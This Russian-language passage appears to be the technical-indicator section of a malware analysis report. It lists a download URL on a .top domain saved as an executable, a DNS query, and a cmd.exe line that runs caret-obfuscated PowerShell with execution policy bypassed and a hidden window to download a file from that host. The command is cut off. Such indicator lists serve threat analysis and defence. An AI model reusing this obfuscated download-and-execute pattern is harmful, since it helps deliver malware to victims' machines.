Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^wer^ShEll.exE ^-Exe^cUtion^P^OLI^C^y^ ^ByPaS^S^ -NO^P^R^OfilE^ -WiNd^Ow^sT^y^L^e hi^D^dE^N^ ^(Ne^W-^Ob^jeC^t S^Y^st^e^m.^nE^T^.WeBcLIe^Nt).D^O^Wnl^O^Adfil^E(^'http://new...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "p^o^wer^ShEll.exE ^-Exe^cUtion^P^OLI^C^y^ ^ByPaS^S^ -NO^P^R^OfilE^ -WiNd^Ow^sT^y^L^e hi^D^dE^N^ ^(Ne^W-^Ob^jeC^t S^Y^st^e^m.^nE^T^.WeBcLIe^Nt).D^O^Wnl^O^Adfil^E(^'http://new...' (со скрытым окном)